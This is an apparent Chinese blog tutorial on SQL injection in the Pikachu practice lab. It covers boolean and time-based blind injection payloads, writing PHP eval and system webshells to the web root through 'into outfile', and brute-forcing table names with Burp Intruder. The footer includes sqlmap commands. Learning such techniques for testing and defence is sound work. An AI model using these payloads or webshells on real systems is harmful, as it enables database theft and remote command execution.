sql-Inject漏洞(盲注)/os远程控制/表(列)名的暴力破解

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量441 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44696653/article/details/89069005
版权

Sql-Inject漏洞-盲注

什么是盲注以及常见的盲注类型:
在有些情况下,后台使用了错误的消息屏蔽方法(比如@)屏蔽了报错
此时便无法在根据报错信息来进行注入的判断。
这种情况下的注入,称为“盲注”。根据表现形式不同,盲注又分为based boolean和based time两种类型
一、基于(boolean)真假的盲注主要表现症状:
0.没有报错信息
1.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或1)
2.在正确的输入下,输入and1=1/and1=2发现可以判断
在pikachu实验环境进行基于真假的盲注的演示:
首先通过在数据库中的操作理解逻辑。
在这里插入图片描述
可知通过ascill码转换比较大小的方式可以渐渐得出正确的结果。截取数据库中的一个字符转换成ascill码去进行比较操作。根据返回值提供的真假信息,可以逐步得出数据库中的信息。不过这种盲注的方式较为麻烦,需要大量的操作。可以通过工具进行自动化的测试。
database的字符长度可以以相同的逻辑通过length函数进行长度判断。
在这里插入图片描述
通过不断地比较根据返回值得真假一步步确定最后的长度。
明白了逻辑就可以前往pikachu的环境进行实际的演示操作。
首先构造payload:kobe’ and ascii(substr(database(),1,1))>113#
payload的逻辑为:如果返回了kobe的信息则后面语句的结果为真,如果没有返回kobe的信息则说明后面语句的结果为假。在实际操作环境时往往需要实验多次才能得出最后的结果。在pikachu实验环境进行演示时>113和>112的结果返回都为假而=112则为真,这就表明第一个字符的吗码值等于112翻译过来就是p,这样就得到了第一个字符p。经过多次操作就可以得到最终的结果。虽然较为麻烦,但是是实际有效的注入方法。
在这里插入图片描述
在实际操作中可以根据逻辑改变payload进行对于数据库表名等信息的获取。
二、基于(time)时间的盲注主要表现症状:
如果说基于boolea的盲注在页面上还可以看到0or1的回显的话,那么基于time的盲注完全就啥都看不到了!但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确定注入!
常用的payload:xxx’ and sleep(5)#查看kobe和kobe’ and sleep(5)#的区别,从而判断这里存在based time的sql注入漏洞。
pikachu实际操作演示:在mysql中有sleep函数可以起到暂停的作用等到一段时间后再去执行。可以通过查看后台反馈的时间来判断sleep函数有没有被拼接进去。这里通过打开浏览器的控制台打开网络查看后台反馈的具体时间。
通过常用的payload:kobe’ and sleep(5)#
在这里插入图片描述
查看请求时间线,可见后台经过了六秒才将结果反馈到前端,这就意味着sleep函数被执行了,则可判断相应点存在sql注入漏洞且是基于时间的盲注。
在设计payload时大体思路与前面相同,只是在基于真假时,是根据返回结果的正确与否来最终获取信息,基于时间的盲注则是通过查看反馈时间的长短基于时间的延迟,来最终获取信息。
payload:kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)# 通过if函数进行多次猜测。
在这里插入图片描述
在这里插入图片描述
在pikachu实际环境中进行测试,只有正确的结果会使返回时间延迟。这就可以通过多次猜测判断来获取信息。
根据实际案例,可以对payload进行更改,从而达到自己的目的。

Sql-Inject漏洞手动测试-os远程控制

一句话木马/如何通过into outfile写入恶意代码并控制OS。
一、一句话木马
一句话木马是一种短小而精悍的木马客户端(利用各种语言执行命令的函数构造一个简单的木马程序,可以将函数写到文件中,通过对文件访问,执行函数,传入设定的操作),隐蔽性好,且功能强大。
PHP: <?php @eval($_POST['chopper']);?>
ASP: <%eval request(“chopper”)%>
ASP. NET: <%@Page Language=’‘Jscript"%><%eval (Request.Item[“chopper”],’‘unsafe’’);%>
二、如何写入一句话木马
通过sql注入漏洞结合into outfile来实现对文件的写入。
select 1,2 into outfile “/var/www/html/1.txt”
into outfile 将select的结果写入到指定目录1.text中
在一些没有回显的注入中可以使用into outfile将结果写入到指定文件中,然后访问获取
用into out写入的前提条件:
1.需要知道远程目录
2.需要远程目录有写入权限
3.需要数据库开启了secure_file_priv
在MySQL中可以通过show global variables like ‘%secure%’;来查看secure_file_priv是否开启,一般默认为关闭。
在win10系统中需要找到my.ini文件,在[mysqld]内加入secure_file_priv = 此时再查看则为开启状态:
在这里插入图片描述
在这里插入图片描述
在保证了前提后,就可以在实际情况中进行演示:
首先是构造payload:kobe’ union select ‘’<?php @eval( $_GET['test'])?>’’,2 into outfile ‘’/var/www/html/1.php’’#
将一句话木马写到select的字段中去。into outfile就可以将结果写入到后面的文件当中去了。
同样用kobe’ union select ‘’<?php system( $_GET['cmd'])?>’’,2 into outfile ‘’/var/www/html/2.php’’#传进去的命令都会被作为system执行的命令去执行。

sql-inject漏洞之表(列)名的暴力破解

为了应对权限被屏蔽或不是mysql的数据库的情况,可以采用暴力破解的方法。
在pikachu实际环境进行演示
在字符型注入的页面 编辑payload:kobe‘ and exists(select * from aa)#
将前面的字符串进行查询,同时将and作为逻辑运算符运算后面对应的内容是否存在。aa(表名)是一个字典。从字典里提取数据以此作查询。如果表不存在则反馈假,如果存在则反馈真。
输入payload后显示数据包不存在,使用burpsuite proxy将数据包抓下来发送至intruder
将aa进行add。在options flag添加doesn’t exist 用字典进行暴力破解的测试 。用这样的方式就可以得到数据库的表名列名等信息。

黑黑黑白白白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
jsql-injection:jSQL Injection是用于自动SQL数据库入的Java应用程序
02-02
描述 jSQL Injection是一个轻量级应用程序,用于从远程服务器查找数据库信息。 它是免费的,开源的和跨平台的,适用于Windows,Linux和Mac OS X(带有Java,版本8至15)。 jSQL Injection也是官方渗透测试发行版一部分,并包含在其他各种发行版中,例如 , , 和 。 产品特点 自动入33种数据库:Access,Altibase,C-treeACE,CockroachDB,CUBRID,DB2,Derby,Exasol,Firebird,FrontBase,H2,Hana,HSQLDB,Informix,Ingres,InterSystems-IRIS,MaxDB,Mckoi,MemSQL, MimerSQL,MonetDB,MySQL,Neo4j,Netezza,NuoDB,Oracle,PostgreSQL,Presto,SQLite,SQL Server,Sybase,Teradata和Vertica 多种入策略:正常,错误,堆叠,和时间 各种入过程:默认,Zip,Dios 用于SQL和篡改脚本的沙箱 出以
SQL 入神器:jSQL Injection 保姆级教程
Flag少侠的博客
04-06 1100
jSQL Injection是一种用于检测和利用SQL漏洞的工具,它专门针对Java应用程序进行SQL入攻击。总的来说,jSQL Injection是一种强大的工具,可用于检测和利用Java应用程序中的SQL漏洞。然而,使用该工具时必须遵循合法和道德的原则,以确保不会对他人的系统造成任何损害。
sql入之
最新发布
weixin_64815500的博客
06-19 960
sql入关于无回显用到的,sqli-labs靶场为例子讲解常用类型以及函数。面试或者打ctf可用作参考
【SQL入-11】base64入案例—以Sqli-labs-less22为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2896
目录1 base64入概述1.1 base64编码基础1.2 base64编码与URL编码1.3 base64入2 base64入案例2.1 实验平台2.2 实验过程2.2.1 入前准备2.2.2 判断入点及入类型2.2.3 尝试使用union查询2.2.4 获取库名名字段名字段内容 1 base64入概述 1.1 base64编码基础 定义:Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来示二进制数据的方法。 Base
WebWall-05.SQL-Inject(SQL漏洞)
凯歌响起的博客
08-27 350
数据库漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入 点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。......
SQL入2——(重学)
qq_52263650的博客
11-07 3782
SQL入2——布尔型(重学)
gulp-inject-partials:基于其路径名递归入部分。 gulp-inject具体案例的实现
02-03
Gulp-inject-partials解析目标文件,定位已定义的占位符,并根据其相对路径入文件内容。 请参阅下面的和。 Gulp-inject-Partials受启发。 意:需要NodeJ v4或更高版本。 安装 安装gulp-inject-partials作为...
JNDI-Inject-Exploit
11-04
# JNDI-Inject-Exploit ## 免责声明 本工具仅面向**合法授权的企业安全测试**,如您需测试本工具的可用性请自行搭建靶机环境,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的...
sisu-inject-bean-1.4.2.jar
01-08
sisu-inject-bean-1.4.2.jar
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
MySQL(Blind SQL Injection)是一种特殊类型的SQL入攻击,攻击者无法直接看到数据库的响应,而是通过观察应用程序的间接行为来判断是否存在漏洞或获取数据。这种攻击方式通常发生在目标系统对错误信息进行了...
sql-inject-reject:HTTP服务器中间件,用于检测和拒绝SQL入尝试
05-11
入门将sql-inject-reject安装为npm模块并将其作为依赖项保存到package.json文件中: npm install sql-inject-reject 一旦安装,您可以通过调用require('sql-inject-reject');来引用它require('sql-inject-reject');...
Converter-cn编码工具
12-11
CTF比赛中,经常遇到编码转换的问题,搜集整理分享一款编码转换工具给大家。Converter是一款进制编码转换工具,支持多种编码转换操作
jsql-injection
05-27
多平台渗透测试工具,需要Java环境支持,跟sqlmap功能类似,但是有图形界面
SQL
weixin_59872639的博客
02-18 2443
在SQL入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为。 在中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,可分为两类: 基于布尔的(Boolean based) 基于时间的(Time based) 基于布尔的 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
SQL(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
原理 的分类 常用函数 的利用方法 一、SQL概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的来获取信息。 2.是不能通过直接显示的途径来获取数据库数据的方法。 可以分为三类: 布尔 时间 报错型 1、布尔 查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL入之
xiao_he0123的博客
03-20 7000
SQL入之前言一、分类二、具体解析1.基于布尔的sql首先要先了解一下sql入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体入方法2.基于时间的SQL3.基于报错的SQL1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为就是在 sql 入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、分类 分为三类: (1)基于布尔的SQL (2)基于事
sql手工入实战
mulincong的博客
05-30 2261
sql手工入封神台靶场
暴力破解、SQL
Lora青蛙的博客
06-29 767
如何查找网站后台 查找网站后台入口 1、手工找默认后台(开源类程序) admin/、admin/login.asp、manage、login.asp… 2、字典扫描 Web目录字典扫描方法,类似于暴力破解软件:wwwscan,御剑后台扫描,DirBuster 3、目录爬行 网络爬虫,编写脚本,自动遍历Web目录,不依赖于字典,主要依靠爬行算法的效率。 代软件:appscan,Awvs 4、google hack 如何防御查找后台 ...
Inject集合----远程线程
qq_42021840的博客
05-13 512
在平时写代码的时候,有很多时候会用到入,比如说获取对方进程中的一些数据等等,所以今天就先更新一篇远程线程入的文章,便于理解和学习。 介绍: 远程线程入就是通过CreateRemoteThread函数,来在对方进程中起一个线程,虽说应该是个线程,但是线程也是来执行代码的,所以我传入LoadLibrary是不是就可以在对方进程中来加载一个DLL呢? 答案肯定是可以的。但是LoadLibrary函数的参数是一个DLL 的完整路径,由于进程地址空间都是虚拟内存,各个进程之间地址空间并不相连,所以我们就需.
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑黑黑白白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值